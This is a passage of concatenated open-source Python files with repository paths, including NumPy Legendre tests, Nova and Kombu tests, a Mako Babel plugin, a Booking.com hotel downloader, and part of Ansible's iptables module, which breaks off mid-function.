assert_raises(TypeError, leg.legfit, [1], [1, 2], 0)
assert_raises(TypeError, leg.legfit, [1], [1], 0, w=[[1]])
assert_raises(TypeError, leg.legfit, [1], [1], 0, w=[1, 1])
# Test fit
x = np.linspace(0, 2)
y = f(x)
#
coef3 = leg.legfit(x, y, 3)
assert_equal(len(coef3), 4)
assert_almost_equal(leg.legval(x, coef3), y)
#
coef4 = leg.legfit(x, y, 4)
assert_equal(len(coef4), 5)
assert_almost_equal(leg.legval(x, coef4), y)
#
coef2d = leg.legfit(x, np.array([y, y]).T, 3)
assert_almost_equal(coef2d, np.array([coef3, coef3]).T)
# test weighting
w = np.zeros_like(x)
yw = y.copy()
w[1::2] = 1
y[0::2] = 0
wcoef3 = leg.legfit(x, yw, 3, w=w)
assert_almost_equal(wcoef3, coef3)
#
wcoef2d = leg.legfit(x, np.array([yw, yw]).T, 3, w=w)
assert_almost_equal(wcoef2d, np.array([coef3, coef3]).T)
# test scaling with complex values x points whose square
# is zero when summed.
x = [1, 1j, -1, -1j]
assert_almost_equal(leg.legfit(x, x, 1), [0, 1])
class TestCompanion(TestCase):
def test_raises(self):
assert_raises(ValueError, leg.legcompanion, [])
assert_raises(ValueError, leg.legcompanion, [1])
def test_dimensions(self):
for i in range(1, 5):
coef = [0]*i + [1]
assert_(leg.legcompanion(coef).shape == (i, i))
def test_linear_root(self):
assert_(leg.legcompanion([1, 2])[0, 0] == -.5)
class TestGauss(TestCase):
def test_100(self):
x, w = leg.leggauss(100)
# test orthogonality. Note that the results need to be normalized,
# otherwise the huge values that can arise from fast growing
# functions like Laguerre can be very confusing.
v = leg.legvander(x, 99)
vv = np.dot(v.T * w, v)
vd = 1/np.sqrt(vv.diagonal())
vv = vd[:, None] * vv * vd
assert_almost_equal(vv, np.eye(100))
# check that the integral of 1 is correct
tgt = 2.0
assert_almost_equal(w.sum(), tgt)
class TestMisc(TestCase):
def test_legfromroots(self):
res = leg.legfromroots([])
assert_almost_equal(trim(res), [1])
for i in range(1, 5):
roots = np.cos(np.linspace(-np.pi, 0, 2*i + 1)[1::2])
pol = leg.legfromroots(roots)
res = leg.legval(roots, pol)
tgt = 0
assert_(len(pol) == i + 1)
assert_almost_equal(leg.leg2poly(pol)[-1], 1)
assert_almost_equal(res, tgt)
def test_legroots(self):
assert_almost_equal(leg.legroots([1]), [])
assert_almost_equal(leg.legroots([1, 2]), [-.5])
for i in range(2, 5):
tgt = np.linspace(-1, 1, i)
res = leg.legroots(leg.legfromroots(tgt))
assert_almost_equal(trim(res), trim(tgt))
def test_legtrim(self):
coef = [2, -1, 1, 0]
# Test exceptions
assert_raises(ValueError, leg.legtrim, coef, -1)
# Test results
assert_equal(leg.legtrim(coef), coef[:-1])
assert_equal(leg.legtrim(coef, 1), coef[:-3])
assert_equal(leg.legtrim(coef, 2), [0])
def test_legline(self):
assert_equal(leg.legline(3, 4), [3, 4])
def test_leg2poly(self):
for i in range(10):
assert_almost_equal(leg.leg2poly([0]*i + [1]), Llist[i])
def test_poly2leg(self):
for i in range(10):
assert_almost_equal(leg.poly2leg(Llist[i]), [0]*i + [1])
def test_weight(self):
x = np.linspace(-1, 1, 11)
tgt = 1.
res = leg.legweight(x)
assert_almost_equal(res, tgt)
if __name__ == "__main__":
run_module_suite()
|
MountainWei/nova
|
refs/heads/master
|
nova/tests/unit/api/openstack/compute/test_extended_virtual_interfaces_net.py
|
35
|
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils
import webob
from nova.api.openstack.compute.legacy_v2.contrib import \
extended_virtual_interfaces_net
from nova import compute
from nova import network
from nova.objects import virtual_interface as vif_obj
from nova import test
from nova.tests.unit.api.openstack import fakes
FAKE_UUID = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
EXPECTED_NET_UUIDS = [123,
456]
def _generate_fake_vifs(context):
vif = vif_obj.VirtualInterface(context=context)
vif.address = '00-00-00-00-00-00'
vif.net_uuid = 123
vif.uuid = '00000000-0000-0000-0000-00000000000000000'
fake_vifs = [vif]
vif = vif_obj.VirtualInterface(context=context)
vif.address = '11-11-11-11-11-11'
vif.net_uuid = 456
vif.uuid = '11111111-1111-1111-1111-11111111111111111'
fake_vifs.append(vif)
return fake_vifs
def compute_api_get(self, context, instance_id, expected_attrs=None,
want_objects=False):
return dict(uuid=FAKE_UUID, id=instance_id, instance_type_id=1, host='bob')
def get_vifs_by_instance(self, context, instance_id):
return _generate_fake_vifs(context)
def get_vif_by_mac_address(self, context, mac_address):
if mac_address == "00-00-00-00-00-00":
return _generate_fake_vifs(context)[0]
else:
return _generate_fake_vifs(context)[1]
class ExtendedServerVIFNetTest(test.NoDBTestCase):
content_type = 'application/json'
prefix = "%s:" % extended_virtual_interfaces_net. \
Extended_virtual_interfaces_net.alias
def setUp(self):
super(ExtendedServerVIFNetTest, self).setUp()
self.stubs.Set(compute.api.API, "get",
compute_api_get)
self.stubs.Set(network.api.API, "get_vifs_by_instance",
get_vifs_by_instance)
self.stubs.Set(network.api.API, "get_vif_by_mac_address",
get_vif_by_mac_address)
self.flags(
osapi_compute_extension=[
'nova.api.openstack.compute.contrib.select_extensions'],
osapi_compute_ext_list=['Virtual_interfaces',
'Extended_virtual_interfaces_net'])
def _make_request(self, url):
req = webob.Request.blank(url)
req.headers['Accept'] = self.content_type
res = req.get_response(fakes.wsgi_app(init_only=(
'os-virtual-interfaces', 'OS-EXT-VIF-NET')))
return res
def _get_vifs(self, body):
return jsonutils.loads(body).get('virtual_interfaces')
def _get_net_id(self, vifs):
for vif in vifs:
yield vif['%snet_id' % self.prefix]
def assertVIFs(self, vifs):
result = []
for net_id in self._get_net_id(vifs):
result.append(net_id)
sorted(result)
for i, net_uuid in enumerate(result):
self.assertEqual(net_uuid, EXPECTED_NET_UUIDS[i])
def test_get_extend_virtual_interfaces_list(self):
res = self._make_request('/v2/fake/servers/abcd/os-virtual-interfaces')
self.assertEqual(res.status_int, 200)
self.assertVIFs(self._get_vifs(res.body))
|
thunderace/newtifry
|
refs/heads/master
|
appengine/mako/ext/babelplugin.py
|
60
|
# ext/babelplugin.py
# Copyright (C) 2006-2015 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""gettext message extraction via Babel: http://babel.edgewall.org/"""
from babel.messages.extract import extract_python
from mako.ext.extract import MessageExtractor
class BabelMakoExtractor(MessageExtractor):
def __init__(self, keywords, comment_tags, options):
self.keywords = keywords
self.options = options
self.config = {
'comment-tags': u' '.join(comment_tags),
'encoding': options.get('input_encoding',
options.get('encoding', None)),
}
super(BabelMakoExtractor, self).__init__()
def __call__(self, fileobj):
return self.process_file(fileobj)
def process_python(self, code, code_lineno, translator_strings):
comment_tags = self.config['comment-tags']
for lineno, funcname, messages, python_translator_comments \
in extract_python(code,
self.keywords, comment_tags, self.options):
yield (code_lineno + (lineno - 1), funcname, messages,
translator_strings + python_translator_comments)
def extract(fileobj, keywords, comment_tags, options):
"""Extract messages from Mako templates.
:param fileobj: the file-like object the messages should be extracted from
:param keywords: a list of keywords (i.e. function names) that should be
recognized as translation functions
:param comment_tags: a list of translator tags to search for and include
in the results
:param options: a dictionary of additional options (optional)
:return: an iterator over ``(lineno, funcname, message, comments)`` tuples
:rtype: ``iterator``
"""
extractor = BabelMakoExtractor(keywords, comment_tags, options)
for message in extractor(fileobj):
yield message
|
ZoranPavlovic/kombu
|
refs/heads/master
|
t/unit/transport/test_filesystem.py
|
2
|
import tempfile
import pytest
import t.skip
from kombu import Connection, Exchange, Queue, Consumer, Producer
@t.skip.if_win32
class test_FilesystemTransport:
def setup(self):
self.channels = set()
try:
data_folder_in = tempfile.mkdtemp()
data_folder_out = tempfile.mkdtemp()
except Exception:
pytest.skip('filesystem transport: cannot create tempfiles')
self.c = Connection(transport='filesystem',
transport_options={
'data_folder_in': data_folder_in,
'data_folder_out': data_folder_out,
})
self.channels.add(self.c.default_channel)
self.p = Connection(transport='filesystem',
transport_options={
'data_folder_in': data_folder_out,
'data_folder_out': data_folder_in,
})
self.channels.add(self.p.default_channel)
self.e = Exchange('test_transport_filesystem')
self.q = Queue('test_transport_filesystem',
exchange=self.e,
routing_key='test_transport_filesystem')
self.q2 = Queue('test_transport_filesystem2',
exchange=self.e,
routing_key='test_transport_filesystem2')
def teardown(self):
# make sure we don't attempt to restore messages at shutdown.
for channel in self.channels:
try:
channel._qos._dirty.clear()
except AttributeError:
pass
try:
channel._qos._delivered.clear()
except AttributeError:
pass
def _add_channel(self, channel):
self.channels.add(channel)
return channel
def test_produce_consume_noack(self):
producer = Producer(self._add_channel(self.p.channel()), self.e)
consumer = Consumer(self._add_channel(self.c.channel()), self.q,
no_ack=True)
for i in range(10):
producer.publish({'foo': i},
routing_key='test_transport_filesystem')
_received = []
def callback(message_data, message):
_received.append(message)
consumer.register_callback(callback)
consumer.consume()
while 1:
if len(_received) == 10:
break
self.c.drain_events()
assert len(_received) == 10
def test_produce_consume(self):
producer_channel = self._add_channel(self.p.channel())
consumer_channel = self._add_channel(self.c.channel())
producer = Producer(producer_channel, self.e)
consumer1 = Consumer(consumer_channel, self.q)
consumer2 = Consumer(consumer_channel, self.q2)
self.q2(consumer_channel).declare()
for i in range(10):
producer.publish({'foo': i},
routing_key='test_transport_filesystem')
for i in range(10):
producer.publish({'foo': i},
routing_key='test_transport_filesystem2')
_received1 = []
_received2 = []
def callback1(message_data, message):
_received1.append(message)
message.ack()
def callback2(message_data, message):
_received2.append(message)
message.ack()
consumer1.register_callback(callback1)
consumer2.register_callback(callback2)
consumer1.consume()
consumer2.consume()
while 1:
if len(_received1) + len(_received2) == 20:
break
self.c.drain_events()
assert len(_received1) + len(_received2) == 20
# compression
producer.publish({'compressed': True},
routing_key='test_transport_filesystem',
compression='zlib')
m = self.q(consumer_channel).get()
assert m.payload == {'compressed': True}
# queue.delete
for i in range(10):
producer.publish({'foo': i},
routing_key='test_transport_filesystem')
assert self.q(consumer_channel).get()
self.q(consumer_channel).delete()
self.q(consumer_channel).declare()
assert self.q(consumer_channel).get() is None
# queue.purge
for i in range(10):
producer.publish({'foo': i},
routing_key='test_transport_filesystem2')
assert self.q2(consumer_channel).get()
self.q2(consumer_channel).purge()
assert self.q2(consumer_channel).get() is None
|
yaqiyang/autorest
|
refs/heads/master
|
src/client/Python/msrest/msrest/__init__.py
|
13
|
# --------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
# --------------------------------------------------------------------------
from .configuration import Configuration
from .service_client import ServiceClient
from .serialization import Serializer, Deserializer
from .version import msrest_version
__all__ = [
"ServiceClient",
"Serializer",
"Deserializer",
"Configuration"
]
__version__ = msrest_version
|
axinging/chromium-crosswalk
|
refs/heads/master
|
build/android/pylib/monkey/setup.py
|
125
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates test runner factory and tests for monkey tests."""
from pylib.monkey import test_runner
def Setup(test_options):
"""Create and return the test runner factory and tests.
Args:
test_options: A MonkeyOptions object.
Returns:
A tuple of (TestRunnerFactory, tests).
"""
# Token to replicate across devices as the "test". The TestRunner does all of
# the work to run the test.
tests = ['MonkeyTest']
def TestRunnerFactory(device, shard_index):
return test_runner.TestRunner(
test_options, device, shard_index)
return (TestRunnerFactory, tests)
|
fsb4000/electrum-server
|
refs/heads/master
|
scrypt/setup.py
|
6
|
from distutils.core import setup, Extension
ltc_scrypt_module = Extension('ltc_scrypt',
sources = ['scryptmodule.c',
'scrypt.c'],
include_dirs=['.'])
setup (name = 'ltc_scrypt',
version = '1.0',
description = 'Bindings for scrypt proof of work used by Novacoin',
ext_modules = [ltc_scrypt_module])
|
trevisanj/f311
|
refs/heads/master
|
tests/test_filetypes/test_import_filetypes.py
|
1
|
import f311.filetypes as ft
def test_import_filetypes():
pass
|
alexzatsepin/omim
|
refs/heads/master
|
tools/python/booking/download_hotels.py
|
1
|
#!/usr/bin/env python
import argparse
import datetime
import logging
import os
import statistics
import sys
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor, as_completed
from functools import partial
from multiprocessing.pool import ThreadPool
import math
from eviltransform import gcj2wgs_exact
from tqdm import tqdm
from .api.booking_api import BookingApi, BookingListApi, LIMIT_REQUESTS_PER_MINUTE
from .api.exceptions import GettingMinPriceError
SUPPORTED_LANGUAGES = ("en", "ru", "ar", "cs", "da", "nl", "fi", "fr", "de",
"hu", "id", "it", "ja", "ko", "pl", "pt", "ro", "es",
"sv", "th", "tr", "uk", "vi", "zh", "he", "sk", "el")
class BookingGen:
def __init__(self, api, country):
self.api = api
self.country_code = country["country"]
self.country_name = country["name"]
logging.info(f"Download[{self.country_code}]: {self.country_name}")
extras = ["hotel_info", "room_info"]
self.hotels = self._download_hotels(extras=extras)
self.translations = self._download_translations()
self.currency_medians = self._currency_medians_by_cities()
def generate_tsv_rows(self, sep="\t"):
self._fix_hotels()
return (self._create_tsv_hotel_line(hotel, sep) for hotel in self.hotels)
@staticmethod
def _get_hotel_min_price(hotel):
prices = (float(x["room_info"]["min_price"]) for x in hotel["room_data"])
flt = filter(lambda x: not math.isclose(x, 0.0), prices)
try:
return min(flt)
except ValueError:
raise GettingMinPriceError(f"Getting min price error: {prices}.")
@staticmethod
def _format_string(s):
s = s.strip()
for x in (("\t", " "), ("\n", " "), ("\r", "")):
s = s.replace(*x)
return s
def _download_hotels(self, **params):
return self.api.hotels(country_ids=self.country_code, **params)
def _download_translations(self):
extras = ["hotel_info", ]
translations = defaultdict(dict)
with ThreadPoolExecutor(max_workers=len(SUPPORTED_LANGUAGES)) as executor:
m = {executor.submit(self._download_hotels, extras=extras, language=lang): lang
for lang in SUPPORTED_LANGUAGES}
for future in as_completed(m):
lang = m[future]
hotels = future.result()
for hotel in hotels:
hotel_id = hotel["hotel_id"]
hotel_data = hotel["hotel_data"]
translations[hotel_id][lang] = {
"name": BookingGen._format_string(hotel_data["name"]),
"address": BookingGen._format_string(hotel_data["address"])
}
return translations
def _fix_hotels(self):
if self.country_code == "cn":
# Fix chinese coordinates.
# https://en.wikipedia.org/wiki/Restrictions_on_geographic_data_in_China
for hotel in self.hotels:
hotel_data = hotel["hotel_data"]
location = hotel_data["location"]
try:
location["latitude"], location["longitude"] = gcj2wgs_exact(
float(location["latitude"]), float(location["longitude"])
)
except ValueError:
logging.exception(f"Converting error {location}")
def _currency_medians_by_cities(self):
cities = defaultdict(lambda: defaultdict(list))
for hotel in self.hotels:
hotel_data = hotel["hotel_data"]
city_id = hotel_data["city_id"]
currency = hotel_data["currency"]
try:
price = BookingGen._get_hotel_min_price(hotel)
except GettingMinPriceError:
logging.exception("Getting min price error.")
continue
cities[city_id][currency].append(price)
for city in cities:
for currency in cities[city]:
cities[city][currency] = statistics.median(cities[city][currency])
return cities
def _get_rate(self, hotel):
# Price rate ranges, relative to the median price for a city
rates = (0.7, 1.3)
rate = 0
hotel_data = hotel["hotel_data"]
city_id = hotel_data["city_id"]
currency = hotel_data["currency"]
price = None
try:
price = BookingGen._get_hotel_min_price(hotel)
except GettingMinPriceError:
logging.exception("Getting min price error.")
return rate
avg = self.currency_medians[city_id][currency]
rate = 1
# Find a range that contains the price
while rate <= len(rates) and price > avg * rates[rate - 1]:
rate += 1
return rate
def _get_translations(self, hotel):
try:
tr = self.translations[hotel["hotel_id"]]
except KeyError:
return ""
hotel_data = hotel["hotel_data"]
name = hotel_data["name"]
address = hotel_data["address"]
tr_ = defaultdict(dict)
for k, v in tr.items():
n = v["name"] if v["name"] != name else ""
a = v["address"] if v["address"] != address else ""
if a or n:
tr_[k]["name"] = n
tr_[k]["address"] = a
tr_list = []
for tr_lang, tr_values in tr_.items():
tr_list.append(tr_lang)
tr_list.extend([tr_values[e] for e in ("name", "address")])
return "|".join(s.replace("|", ";") for s in tr_list)
def _create_tsv_hotel_line(self, hotel, sep="\t"):
hotel_data = hotel["hotel_data"]
location = hotel_data["location"]
row = (
hotel["hotel_id"],
f"{location['latitude']:.6f}",
f"{location['longitude']:.6f}",
hotel_data["name"],
hotel_data["address"],
hotel_data["class"],
self._get_rate(hotel),
hotel_data["ranking"],
hotel_data["review_score"],
hotel_data["url"],
hotel_data["hotel_type_id"],
self._get_translations(hotel)
)
return sep.join(BookingGen._format_string(str(x)) for x in row)
def download_hotels_by_country(api, country):
generator = BookingGen(api, country)
rows = list(generator.generate_tsv_rows())
logging.info(f"For {country['name']} {len(rows)} lines were generated.")
return rows
def download(country_code, user, password, path, threads_count,
progress_bar=tqdm(disable=True)):
api = BookingApi(user, password, "2.4")
list_api = BookingListApi(api)
countries = list_api.countries(languages="en")
if country_code is not None:
countries = list(filter(lambda x: x["country"] in country_code, countries))
logging.info(f"There is {len(countries)} countries.")
progress_bar.desc = "Countries"
progress_bar.total = len(countries)
with open(path, "w") as f:
with ThreadPool(threads_count) as pool:
for lines in pool.imap_unordered(partial(download_hotels_by_country, list_api),
countries):
f.writelines([f"{x}\n" for x in lines])
progress_bar.update()
logging.info(f"Hotels were saved to {path}.")
def process_options():
parser = argparse.ArgumentParser(description="Download and process booking hotels.")
parser.add_argument("-v", "--verbose", action="store_true")
parser.add_argument("--logfile", default="",
help="Name and destination for log file")
parser.add_argument("--password", required=True, dest="password",
help="Booking.com account password")
parser.add_argument("--user", required=True, dest="user",
help="Booking.com account user name")
parser.add_argument("--threads_count", default=1, type=int,
help="The number of threads for processing countries.")
parser.add_argument("--output", required=True, dest="output",
help="Name and destination for output file")
parser.add_argument("--country_code", default=None, action="append",
help="Download hotels of this country.")
options = parser.parse_args()
return options
def main():
options = process_options()
logfile = ""
if options.logfile:
logfile = options.logfile
else:
now = datetime.datetime.now()
name = f"{now.strftime('%d_%m_%Y-%H_%M_%S')}_booking_hotels.log"
logfile = os.path.join(os.path.dirname(os.path.realpath(__file__)), name)
print(f"Logs saved to {logfile}.", file=sys.stdout)
if options.threads_count > 1:
print(f"Limit requests per minute is {LIMIT_REQUESTS_PER_MINUTE}.", file=sys.stdout)
logging.basicConfig(level=logging.DEBUG, filename=logfile,
format="%(thread)d [%(asctime)s] %(levelname)s: %(message)s")
with tqdm(disable=not options.verbose) as progress_bar:
download(options.country_code, options.user, options.password,
options.output, options.threads_count, progress_bar)
if __name__ == "__main__":
main()
|
mavit/ansible-modules-extras
|
refs/heads/devel
|
system/iptables.py
|
12
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, Linus Unnebäck <linus@folkdatorn.se>
#
# This file is part of Ansible
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
BINS = dict(
ipv4='iptables',
ipv6='ip6tables',
)
DOCUMENTATION = '''
---
module: iptables
short_description: Modify the systems iptables
requirements: []
version_added: "2.0"
author: Linus Unnebäck (@LinusU) <linus@folkdatorn.se>
description:
- Iptables is used to set up, maintain, and inspect the tables of IP packet
filter rules in the Linux kernel. This module does not handle the saving
and/or loading of rules, but rather only manipulates the current rules
that are present in memory. This is the same as the behaviour of the
"iptables" and "ip6tables" command which this module uses internally.
notes:
- This module just deals with individual rules. If you need advanced
chaining of rules the recommended way is to template the iptables restore
file.
options:
table:
description:
- This option specifies the packet matching table which the command
should operate on. If the kernel is configured with automatic module
loading, an attempt will be made to load the appropriate module for
that table if it is not already there.
required: false
default: filter
choices: [ "filter", "nat", "mangle", "raw", "security" ]
state:
description:
- Whether the rule should be absent or present.
required: false
default: present
choices: [ "present", "absent" ]
ip_version:
description:
- Which version of the IP protocol this rule should apply to.
required: false
default: ipv4
choices: [ "ipv4", "ipv6" ]
chain:
description:
- "Chain to operate on. This option can either be the name of a user
defined chain or any of the builtin chains: 'INPUT', 'FORWARD',
'OUTPUT', 'PREROUTING', 'POSTROUTING', 'SECMARK', 'CONNSECMARK'"
required: true
protocol:
description:
- The protocol of the rule or of the packet to check. The specified
protocol can be one of tcp, udp, udplite, icmp, esp, ah, sctp or the
special keyword "all", or it can be a numeric value, representing one
of these protocols or a different one. A protocol name from
/etc/protocols is also allowed. A "!" argument before the protocol
inverts the test. The number zero is equivalent to all. "all" will
match with all protocols and is taken as default when this option is
omitted.
required: false
default: null
source:
description:
- Source specification. Address can be either a network name,
a hostname, a network IP address (with /mask), or a plain IP address.
Hostnames will be resolved once only, before the rule is submitted to
the kernel. Please note that specifying any name to be resolved with
a remote query such as DNS is a really bad idea. The mask can be
either a network mask or a plain number, specifying the number of 1's
at the left side of the network mask. Thus, a mask of 24 is equivalent
to 255.255.255.0. A "!" argument before the address specification
inverts the sense of the address.Source specification. Address can be
either a network name, a hostname, a network IP address (with /mask),
or a plain IP address. Hostnames will be resolved once only, before
the rule is submitted to the kernel. Please note that specifying any
name to be resolved with a remote query such as DNS is a really bad
idea. The mask can be either a network mask or a plain number,
specifying the number of 1's at the left side of the network mask.
Thus, a mask of 24 is equivalent to 255.255.255.0. A "!" argument
before the address specification inverts the sense of the address.
required: false
default: null
destination:
description:
- Destination specification. Address can be either a network name,
a hostname, a network IP address (with /mask), or a plain IP address.
Hostnames will be resolved once only, before the rule is submitted to
the kernel. Please note that specifying any name to be resolved with
a remote query such as DNS is a really bad idea. The mask can be
either a network mask or a plain number, specifying the number of 1's
at the left side of the network mask. Thus, a mask of 24 is equivalent
to 255.255.255.0. A "!" argument before the address specification
inverts the sense of the address.Source specification. Address can be
either a network name, a hostname, a network IP address (with /mask),
or a plain IP address. Hostnames will be resolved once only, before
the rule is submitted to the kernel. Please note that specifying any
name to be resolved with a remote query such as DNS is a really bad
idea. The mask can be either a network mask or a plain number,
specifying the number of 1's at the left side of the network mask.
Thus, a mask of 24 is equivalent to 255.255.255.0. A "!" argument
before the address specification inverts the sense of the address.
required: false
default: null
match:
description:
- Specifies a match to use, that is, an extension module that tests for
a specific property. The set of matches make up the condition under
which a target is invoked. Matches are evaluated first to last if
specified as an array and work in short-circuit fashion, i.e. if one
extension yields false, evaluation will stop.
required: false
default: []
jump:
description:
- This specifies the target of the rule; i.e., what to do if the packet
matches it. The target can be a user-defined chain (other than the one
this rule is in), one of the special builtin targets which decide the
fate of the packet immediately, or an extension (see EXTENSIONS
below). If this option is omitted in a rule (and the goto paramater
is not used), then matching the rule will have no effect on the
packet's fate, but the counters on the rule will be incremented.
required: false
default: null
goto:
description:
- This specifies that the processing should continue in a user specified
chain. Unlike the jump argument return will not continue processing in
this chain but instead in the chain that called us via jump.
required: false
default: null
in_interface:
description:
- Name of an interface via which a packet was received (only for packets
entering the INPUT, FORWARD and PREROUTING chains). When the "!"
argument is used before the interface name, the sense is inverted. If
the interface name ends in a "+", then any interface which begins with
this name will match. If this option is omitted, any interface name
will match.
required: false
default: null
out_interface:
description:
- Name of an interface via which a packet is going to be sent (for
packets entering the FORWARD, OUTPUT and POSTROUTING chains). When the
"!" argument is used before the interface name, the sense is inverted.
If the interface name ends in a "+", then any interface which begins
with this name will match. If this option is omitted, any interface
name will match.
required: false
default: null
fragment:
description:
- This means that the rule only refers to second and further fragments
of fragmented packets. Since there is no way to tell the source or
destination ports of such a packet (or ICMP type), such a packet will
not match any rules which specify them. When the "!" argument precedes
fragment argument, the rule will only match head fragments, or
unfragmented packets.
required: false
default: null
set_counters:
description:
- This enables the administrator to initialize the packet and byte
counters of a rule (during INSERT, APPEND, REPLACE operations).
required: false
default: null
source_port:
description:
- "Source port or port range specification. This can either be a service
name or a port number. An inclusive range can also be specified, using
the format first:last. If the first port is omitted, '0' is assumed;
if the last is omitted, '65535' is assumed. If the first port is
greater than the second one they will be swapped."
required: false
default: null
destination_port:
description:
- "Destination port or port range specification. This can either be
a service name or a port number. An inclusive range can also be
specified, using the format first:last. If the first port is omitted,
'0' is assumed; if the last is omitted, '65535' is assumed. If the
first port is greater than the second one they will be swapped."
required: false
default: null
to_ports:
description:
- "This specifies a destination port or range of ports to use: without
this, the destination port is never altered. This is only valid if the
rule also specifies one of the following protocols: tcp, udp, dccp or
sctp."
required: false
default: null
to_destination:
version_added: "2.1"
description:
- "This specifies a destination address to use with DNAT: without
this, the destination address is never altered."
required: false
default: null
set_dscp_mark:
version_added: "2.1"
description:
- "This allows specifying a DSCP mark to be added to packets.
It takes either an integer or hex value. Mutually exclusive with
C(set_dscp_mark_class)."
required: false
default: null
set_dscp_mark_class:
version_added: "2.1"
description:
- "This allows specifying a predefined DiffServ class which will be
translated to the corresponding DSCP mark. Mutually exclusive with
C(set_dscp_mark)."
required: false
default: null
comment:
description:
- "This specifies a comment that will be added to the rule"
required: false
default: null
ctstate:
description:
- "ctstate is a list of the connection states to match in the conntrack module.
Possible states are: 'INVALID', 'NEW', 'ESTABLISHED', 'RELATED', 'UNTRACKED', 'SNAT', 'DNAT'"
required: false
default: []
limit:
description:
- "Specifies the maximum average number of matches to allow per second. The number can specify units explicitly, using `/second', `/minute', `/hour' or `/day', or parts of them (so `5/second' is the same as `5/s')."
required: false
default: null
limit_burst:
version_added: "2.1"
description:
- "Specifies the maximum burst before the above limit kicks in."
required: false
default: null
uid_owner:
version_added: "2.1"
description:
- "Specifies the UID or username to use in match by owner rule."
required: false
reject_with:
version_added: "2.1"
description:
- "Specifies the error packet type to return while rejecting."
required: false
'''
EXAMPLES = '''
# Block specific IP
- iptables: chain=INPUT source=8.8.8.8 jump=DROP
become: yes
# Forward port 80 to 8600
- iptables: table=nat chain=PREROUTING in_interface=eth0 protocol=tcp match=tcp destination_port=80 jump=REDIRECT to_ports=8600 comment="Redirect web traffic to port 8600"
become: yes
# Allow related and established connections
- iptables: chain=INPUT ctstate=ESTABLISHED,RELATED jump=ACCEPT
become: yes
# Tag all outbound tcp packets with DSCP mark 8
- iptables: chain=OUTPUT jump=DSCP table=mangle set_dscp_mark=8 protocol=tcp
# Tag all outbound tcp packets with DSCP DiffServ class CS1
- iptables: chain=OUTPUT jump=DSCP table=mangle set_dscp_mark_class=CS1 protocol=tcp
'''
def append_param(rule, param, flag, is_list):
if is_list:
for item in param:
append_param(rule, item, flag, False)
else:
if param is not None:
rule.extend([flag, param])
def append_csv(rule, param, flag):
if param:
rule.extend([flag, ','.join(param)])
def append_match(rule, param, match):
if param:
rule.extend(['-m', match])
def append_jump(rule, param, jump):
if param:
rule.extend(['-j', jump])
def construct_rule(params):
rule = []
append_param(rule, params['protocol'], '-p', False)
append_param(rule, params['source'], '-s', False)
append_param(rule, params['destination'], '-d', False)
append_param(rule, params['match'], '-m', True)
append_param(rule, params['jump'], '-j', False)
append_param(rule, params['to_destination'], '--to-destination', False)
append_param(rule, params['goto'], '-g', False)
append_param(rule, params['in_interface'], '-i', False)
append_param(rule, params['out_interface'], '-o', False)
append_param(rule, params['fragment'], '-f', False)
append_param(rule, params['set_counters'], '-c', False)
append_param(rule, params['source_port'], '--source-port', False)
append_param(rule, params['destination_port'], '--destination-port', False)
append_param(rule, params['to_ports'], '--to-ports', False)
append_param(rule, params['set_dscp_mark'], '--set-dscp', False)
append_param(rule, params['set_dscp_mark_class'], '--set-dscp-class', False)
append_match(rule, params['comment'], 'comment')
append_param(rule, params['comment'], '--comment', False)
append_match(rule, params['ctstate'], 'state')
append_csv(rule, params['ctstate'], '--state')
append_match(rule, params['limit'] or params['limit_burst'], 'limit')
append_param(rule, params['limit'], '--limit', False)
append_param(rule, params['limit_burst'], '--limit-burst', False)
append_match(rule, params['uid_owner'], 'owner')
append_param(rule, params['uid_owner'], '--uid-owner', False)
append_jump(rule, params['reject_with'], 'REJECT')
append_param(rule, params['reject_with'], '--reject-with', False)
return rule
def push_arguments(iptables_path, action, params):
cmd = [iptables_path]
cmd.extend(['-t', params['table']])
cmd.extend([action, params['chain']])
cmd.extend(construct_rule(params))
return cmd
def check_present(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-C', params)
rc, _, __ = module.run_command(cmd, check_rc=False)
return (rc == 0)
def append_rule(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-A', params)
module.run_command(cmd, check_rc=True)
def remove_rule(iptables_path, module, params):
